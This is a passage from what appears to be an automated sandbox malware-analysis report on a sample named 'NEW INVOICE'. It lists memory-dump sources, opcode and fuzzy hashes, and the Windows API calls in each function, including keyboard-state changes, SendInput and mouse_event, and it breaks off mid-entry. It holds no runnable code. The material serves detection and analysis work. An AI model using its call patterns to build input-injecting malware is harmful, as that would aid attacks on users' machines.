                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                    • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                                                                    • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                    • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                                                                    APIs
                                                                                    • GetClientRect.USER32(?,?), ref: 00433724
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                                    • GetClientRect.USER32(0000001D,?), ref: 004337AC
                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                                    • GetWindowRect.USER32(?,?), ref: 00433814
                                                                                    • ScreenToClient.USER32(?,?), ref: 00433842
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                    • String ID:
                                                                                    • API String ID: 3220332590-0
                                                                                    • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                    • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                                                                                    • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                                    • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                    • String ID:
                                                                                    • API String ID: 1612042205-0
                                                                                    • Opcode ID: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                                                                                    • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                                                                                    • Opcode Fuzzy Hash: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                                                                                    • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                                                    • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                                    • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                                    • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                                    • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                                    • SendInput.USER32 ref: 0044C6E2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost$KeyboardState$InputSend
                                                                                    • String ID:
                                                                                    • API String ID: 2221674350-0
                                                                                    • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                    • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                                    • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                    • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscpy$_wcscat
                                                                                    • String ID:
                                                                                    • API String ID: 2037614760-0
                                                                                    • Opcode ID: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                                                                    • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                                                    • Opcode Fuzzy Hash: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                                                                    • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                                                    APIs
                                                                                    • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                                                    • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                    • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                    • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                    • String ID:
                                                                                    • API String ID: 4189319755-0
                                                                                    • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                    • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                                                                    • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                    • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                                                    • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                    • String ID:
                                                                                    • API String ID: 1726766782-0
                                                                                    • Opcode ID: e3e231889b9edf0f74221ee0072ea4e59d90ce0ad37bc94b8ebeee311f112aa0
                                                                                    • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                                                                                    • Opcode Fuzzy Hash: e3e231889b9edf0f74221ee0072ea4e59d90ce0ad37bc94b8ebeee311f112aa0
                                                                                    • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                                                                                    APIs
                                                                                    • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
                                                                                    • EnableWindow.USER32(?,00000000), ref: 0044111A
                                                                                    • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
                                                                                    • ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
                                                                                    • EnableWindow.USER32(?,00000001), ref: 004411B3
                                                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 642888154-0
                                                                                    • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                    • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                                                                                    • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                    • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                                                                    • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                    • String ID:
                                                                                    • API String ID: 1976402638-0
                                                                                    • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                    • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                                                                                    • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                    • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32 ref: 00442597
                                                                                      • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                                                    • GetDesktopWindow.USER32 ref: 004425BF
                                                                                    • GetWindowRect.USER32(00000000), ref: 004425C6
                                                                                    • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                                                      • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                    • GetCursorPos.USER32(?), ref: 00442624
                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                    • String ID:
                                                                                    • API String ID: 4137160315-0
                                                                                    • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                    • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                                                                    • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                    • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                                                                    • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                    • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                    • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Enable$Show$MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 1871949834-0
                                                                                    • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                    • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                                                                                    • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                    • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0044961A
                                                                                    • SendMessageW.USER32 ref: 0044964A
                                                                                      • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                                                                                    • _wcslen.LIBCMT ref: 004496BA
                                                                                    • _wcslen.LIBCMT ref: 004496C7
                                                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$_wcslen$_memset_wcspbrk
                                                                                    • String ID:
                                                                                    • API String ID: 1624073603-0
                                                                                    • Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                    • Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
                                                                                    • Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                    • Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                    • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                                                                                    • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                    • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                                                                                    APIs
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                    • String ID:
                                                                                    • API String ID: 1640429340-0
                                                                                    • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                    • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                                                                                    • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                    • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __fileno__setmode$DebugOutputString_fprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3354276064-0
                                                                                    • Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                                    • Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
                                                                                    • Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                                    • Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                    • String ID:
                                                                                    • API String ID: 752480666-0
                                                                                    • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                    • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                                                    • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                    • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(00000000), ref: 0045527A
                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                    Memory Dump Source
